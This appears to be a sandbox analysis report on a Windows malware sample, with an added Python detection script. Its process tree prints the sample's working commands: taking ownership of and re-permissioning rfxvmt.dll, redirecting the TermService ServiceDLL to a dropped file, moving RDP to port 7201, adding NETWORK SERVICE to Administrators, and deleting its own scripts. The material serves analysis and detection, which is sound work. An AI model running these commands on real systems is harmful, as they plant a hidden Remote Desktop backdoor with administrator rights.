Analysis
- Max time kernel: 138s
- Max time network: 48s
- Platform: windows7_x64
- Resource: win7-20220414-en
- Submitted: 01-07-2022 14:14

Static task: static1
Behavioral task: behavioral1
  Sample: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
  Resource: win10v2004-20220414-en
General
- Target: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
- Size: 2.9MB
- MD5: cc47bc788a58c510b00a5b288769a943
- SHA1: 184478b1e91d3354f5981c19e615bec766c38fab
- SHA256: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e
- SHA512: ddf966d08c8de80ff86f222a4b794d9b0afeb3a1c88070452d086a3e61b8e8c0d65b40afbd2c28f1c0ca9d8f3947a1d9d485177290e0a745091908337dd0e1e6
Malware Config
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges. Here the member added to BUILTIN\Administrators is NT AUTHORITY\NETWORK SERVICE, the identity the Remote Desktop service (TermService) runs under, so whatever is loaded into that service afterwards runs as a local administrator.
- Modifies RDP port number used by Windows (1 TTP)
  PortNumber under Terminal Server\WinStations\RDP-Tcp is set to 0x1C21, i.e. TCP 7201 instead of the default 3389, so the listener is missed by a default-port scan.
- Possible privilege escalation attempt (8 IoCs)
  Processes: 1932 icacls.exe, 872 icacls.exe, 1940 icacls.exe, 824 icacls.exe, 1364 icacls.exe, 1492 takeown.exe, 1164 icacls.exe, 1016 icacls.exe
- Sets DLL path for service in the registry (2 TTPs, 1 IoC)
  reg.exe: Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat"
  The stock value for TermService is %SystemRoot%\System32\termsrv.dll. Pointing it at a dropped file under \Windows\Help means svchost loads that file as the Remote Desktop service on the next service start; a live host can be checked by reading that value and comparing it with the stock path.
- YARA rule match (1 IoC)
  \Windows\Help\tmp5212.dat: upx
- Deletes itself (1 IoC)
  Processes: 624 powershell.exe
  The deletion attributed here is the `del %temp%\*.ps1` in the process tree, i.e. PowerShell removing its own script and the dropped .txt files; the report does not show the sample executable itself being deleted.
- Loads dropped DLL (5 IoCs)
  Processes: 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe (three loads), 956 (two loads; image name not captured in the report)
- Modifies file permissions (1 TTP, 8 IoCs)
  Processes: 824 icacls.exe, 1364 icacls.exe, 1492 takeown.exe, 1164 icacls.exe, 1016 icacls.exe, 1932 icacls.exe, 872 icacls.exe, 1940 icacls.exe
- Drops file in System32 directory (1 IoC)
  powershell.exe: File created C:\Windows\system32\rfxvmt.dll
- Drops file in Windows directory (3 IoCs)
  powershell.exe: File created C:\Windows\help\tmp5213.dat, C:\Windows\help\tmp5211.dat, C:\Windows\help\tmp5212.dat
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic sandbox note; nothing else in this report shows file encryption or a ransom note.)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: 624 powershell.exe (4 occurrences)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, 624 powershell.exe
  Token: SeRestorePrivilege, 1016 icacls.exe (required to assign ownership of rfxvmt.dll to a principal other than the caller, which is what `/setowner "NT SERVICE\TrustedInstaller"` does)
- Suspicious use of WriteProcessMemory (49 IoCs)
  Parent → child, with the number of recorded writes in parentheses (each pair is logged three times, the first four):
  1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe → 1224 cmd.exe (4)
  1224 cmd.exe → 624 powershell.exe (3)
  624 powershell.exe → 1492 takeown.exe (3)
  624 powershell.exe → 1164 icacls.exe (3)
  624 powershell.exe → 1016 icacls.exe (3)
  624 powershell.exe → 1932 icacls.exe (3)
  624 powershell.exe → 872 icacls.exe (3)
  624 powershell.exe → 1940 icacls.exe (3)
  624 powershell.exe → 824 icacls.exe (3)
  624 powershell.exe → 1364 icacls.exe (3)
  624 powershell.exe → 1780 reg.exe (3)
  624 powershell.exe → 444 reg.exe (3)
  624 powershell.exe → 1316 net.exe (3)
  1316 net.exe → 1184 net1.exe (3)
  624 powershell.exe → 1600 cmd.exe (3)
  624 powershell.exe → 1612 cmd.exe (3)
Processes
Indentation shows the parent/child depth of the process tree.

C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
    "C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
            - Deletes itself
            - Drops file in System32 directory
            - Drops file in Windows directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\takeown.exe
                "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
                - Possible privilege escalation attempt
                - Modifies file permissions
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\icacls.exe
                "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
                - Possible privilege escalation attempt
                - Modifies file permissions

            C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

            C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f
                - Sets DLL path for service in the registry
                - Modifies registry key

            C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                - Suspicious use of WriteProcessMemory

                C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

            C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

            C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
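The process tree above is a compact, scriptable sequence: a script host launched with the execution policy bypassed, ownership and ACL changes on a DLL, the TermService ServiceDLL redirected to a dropped file, the RDP listener moved off 3389, and a service identity added to Administrators. The block below is an added example, not part of this report or of the sample, of detection logic that flags each of those steps from process-creation records. It assumes records shaped like Sysmon Event ID 1 (`pid`, `cmdline`); the sample records copy the command lines from the tree, with PIDs taken from the report's WriteProcessMemory sequence (an assumption where the report does not pin a PID to a command line), plus two constructed benign control lines that must stay quiet. Rule names are the example's own.

```python
"""Detection logic for the TermService-tampering chain recorded in the report
above, run over constructed process-creation records (Sysmon Event ID 1 style).
Added example; field names, rule names and the control records are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Values a stock Windows host carries; any other value in these keys is a finding.
DEFAULT_TERMSRV_DLL = r"%systemroot%\system32\termsrv.dll"
DEFAULT_RDP_PORT = 3389
# Built-in service identities that should never appear in BUILTIN\Administrators.
SERVICE_ACCOUNTS = {r"nt authority\network service", r"nt authority\local service",
                    r"nt authority\system"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def split_cmdline(cmd: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted
    arguments together and stripping the surrounding quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def parse_reg_add(tokens: List[str]) -> Optional[Tuple[str, Optional[str], Optional[str]]]:
    """Return (key, value_name, data) for `reg add KEY /v NAME ... /d DATA`, else None."""
    if len(tokens) < 3 or tokens[1].lower() != "add":
        return None
    key, name, data = tokens[2].lower(), None, None
    for i in range(3, len(tokens) - 1):
        if tokens[i].lower() == "/v":
            name = tokens[i + 1].lower()
        elif tokens[i].lower() == "/d":
            data = tokens[i + 1]
    return key, name, data


def parse_reg_dword(data: str) -> int:
    """reg.exe accepts REG_DWORD data as decimal or 0x-prefixed hex."""
    return int(data, 16) if data.lower().startswith("0x") else int(data, 10)


def check_record(rec: Dict[str, object]) -> List[Finding]:
    pid, cmd = int(rec["pid"]), str(rec["cmdline"])
    tokens = split_cmdline(cmd)
    if not tokens:
        return []
    image = tokens[0].lower().rsplit("\\", 1)[-1]
    low = [t.lower() for t in tokens]
    out: List[Finding] = []
    if image in ("reg.exe", "reg"):
        parsed = parse_reg_add(tokens)
        if parsed:
            key, name, data = parsed
            # Remote Desktop service DLL redirected away from termsrv.dll.
            if key.endswith(r"services\termservice\parameters") and name == "servicedll":
                if data is None or data.lower() != DEFAULT_TERMSRV_DLL:
                    out.append(Finding("termservice_servicedll_replaced", pid, data or "<missing>"))
            # Listener moved off 3389 so a default-port scan does not see the rogue service.
            if key.endswith(r"terminal server\winstations\rdp-tcp") and name == "portnumber" and data:
                port = parse_reg_dword(data)
                if port != DEFAULT_RDP_PORT:
                    out.append(Finding("rdp_port_changed", pid, "PortNumber=%d" % port))
    elif image in ("net.exe", "net", "net1.exe", "net1"):
        if len(low) >= 5 and low[1] == "localgroup" and low[2] == "administrators" and "/add" in low:
            member = tokens[3]
            rule = "service_account_made_admin" if member.lower() in SERVICE_ACCOUNTS else "local_admin_added"
            out.append(Finding(rule, pid, member))
    elif image in ("takeown.exe", "takeown", "icacls.exe", "icacls"):
        # Ownership/ACL changes on a DLL driven from a script host are the setup for a DLL swap.
        target = next((t for t in tokens[1:] if t.lower().endswith(".dll")), None)
        if target:
            out.append(Finding("dll_acl_tamper", pid, "%s %s" % (image, target)))
    elif image.startswith("powershell"):
        if ("-ep" in low or "-executionpolicy" in low) and "bypass" in low \
                and any(t.endswith(".ps1") and "\\temp\\" in t for t in low):
            out.append(Finding("powershell_bypass_temp_script", pid, cmd))
    return out


def scan(records: List[Dict[str, object]]) -> List[Finding]:
    return [f for rec in records for f in check_record(rec)]


# Constructed records: command lines copied from the report's process tree; PIDs taken
# from its WriteProcessMemory sequence (an assumption where the report does not pin them).
SAMPLE_RECORDS = [
    {"pid": 624, "cmdline": r"powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1"},
    {"pid": 1492, "cmdline": r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll'},
    {"pid": 1016, "cmdline": r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"'},
    {"pid": 1780, "cmdline": r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'},
    {"pid": 444, "cmdline": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f'},
    {"pid": 1316, "cmdline": r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'},
    # Two benign control lines (constructed) that must stay quiet.
    {"pid": 2000, "cmdline": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrv.dll /f'},
    {"pid": 2001, "cmdline": r'"C:\Windows\system32\icacls.exe" C:\Users\Admin\notes.txt /grant Admin:F'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f.rule, f.pid, f.detail)
```

The same three comparisons (ServiceDLL against the stock termsrv.dll path, PortNumber against 3389, service identities in BUILTIN\Administrators) are what to read directly from a host suspected of running this sample; the command-line rules only catch the moment the change was made, whereas the registry and group state persist after the `del %temp%\*.ps1` cleanup.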
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1 (3.5MB)
  MD5: fdd9a0a19257b291d81aef4d310e9cd4
  SHA1: 79fca0c2c1044c0382ee37158d3c993010f79afe
  SHA256: b842e422cea2540aa4d953b7940c18a6a5e23dabc933e979e9305b56cc3afd2e
  SHA512: bad901dcf7130ee315547313595d259a7954edaf7726d2d65a6412f56ca02d836f1f8cd86ba562d34654e286d6efbc901369be6cbae03cdea027bfa07006a7e2
- C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txt (102B)
  MD5: 7575fd92dd722a9f8eb4d7efce5e0a5f
  SHA1: 7773366c9157ac9be5247c45177ea2d7b7daf86b
  SHA256: 6d6623e881557bf3874f34aeff1d81e4b28aa19f408c43a162a9432ad75f6e9b
  SHA512: 7a50c77308c543886e7fa91149b39e3b0fd7de3b163d275dac03457c7ac4ce63adf4c8f0d22c59ceaae1e34a7eb6677461aad4081e7988502e85e142d0e6065c
- C:\Windows\system32\rfxvmt.dll (40KB)
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
- \Users\Admin\AppData\Local\Temp\nsoB241.tmp\System.dll (11KB)
  An nsXXXX.tmp directory with System.dll is the per-run plugin directory an NSIS installer creates; the sample is packaged as an NSIS installer.
  MD5: fbe295e5a1acfbd0a6271898f885fe6a
  SHA1: d6d205922e61635472efb13c2bb92c9ac6cb96da
  SHA256: a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
  SHA512: 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
- \Users\Admin\AppData\Local\Temp\nsoB241.tmp\blowfish.dll (22KB)
  MD5: 5afd4a9b7e69e7c6e312b2ce4040394a
  SHA1: fbd07adb3f02f866dc3a327a86b0f319d4a94502
  SHA256: 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
  SHA512: f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
- \Windows\Help\tmp5211.dat (116KB)
  MD5: 61de3d9dc03ed2a1d688e1425b52cfda
  SHA1: 68694949cbbba5f21515f6ef762356d20541f03c
  SHA256: cd32a60b92378244fdd4ad85965effac0a9ed538d43b9b06ee7e91c6c2a9a2a9
  SHA512: 9138691813e976dacfc04336325d38236a66f8a3d1848c449a0ec29918cc4d21efd3ec33e39d87006302c10e821a132f2d1ef847dcfe1e2e6a4c132fd9762545
- \Windows\Help\tmp5212.dat (784KB)
  MD5: 72f5170b8b6951ed93d6653bba6b17c1
  SHA1: baadfbc7fe2b2e9c87faddb2d161fa162627828d
  SHA256: d9a7b6d13f5a6f217a6f3e213b95a582d11a6fd93174ec4096892f0d7805e1b8
  SHA512: ad874d06546bb3948024a5456e97adbfd42a2a11b2aeba914cc89752ed778e6fa276bdf2be2d728f95e3accac07067e80488979a97b82581c9adafeac7c4cd69
- memory/444-77-0x0000000000000000-mapping.dmp
- memory/624-59-0x0000000000000000-mapping.dmp
- memory/624-64-0x0000000002534000-0x0000000002537000-memory.dmp (12KB)
- memory/624-62-0x000007FEF3B00000-0x000007FEF465D000-memory.dmp (11.4MB)
- memory/624-66-0x000000000253B000-0x000000000255A000-memory.dmp (124KB)
- memory/624-85-0x0000000002534000-0x0000000002537000-memory.dmp (12KB)
- memory/624-63-0x0000000002534000-0x0000000002537000-memory.dmp (12KB)
- memory/624-61-0x000007FEF4660000-0x000007FEF5083000-memory.dmp (10.1MB)
- memory/624-60-0x000007FEFC021000-0x000007FEFC023000-memory.dmp (8KB)
- memory/624-86-0x000000000253B000-0x000000000255A000-memory.dmp (124KB)
- memory/824-74-0x0000000000000000-mapping.dmp
- memory/872-72-0x0000000000000000-mapping.dmp
- memory/1016-70-0x0000000000000000-mapping.dmp
- memory/1164-69-0x0000000000000000-mapping.dmp
- memory/1184-79-0x0000000000000000-mapping.dmp
- memory/1224-58-0x0000000000000000-mapping.dmp
- memory/1316-78-0x0000000000000000-mapping.dmp
- memory/1364-75-0x0000000000000000-mapping.dmp
- memory/1492-67-0x0000000000000000-mapping.dmp
- memory/1600-83-0x0000000000000000-mapping.dmp
- memory/1612-84-0x0000000000000000-mapping.dmp
- memory/1660-54-0x0000000075761000-0x0000000075763000-memory.dmp (8KB)
- memory/1780-76-0x0000000000000000-mapping.dmp
- memory/1932-71-0x0000000000000000-mapping.dmp
- memory/1940-73-0x0000000000000000-mapping.dmp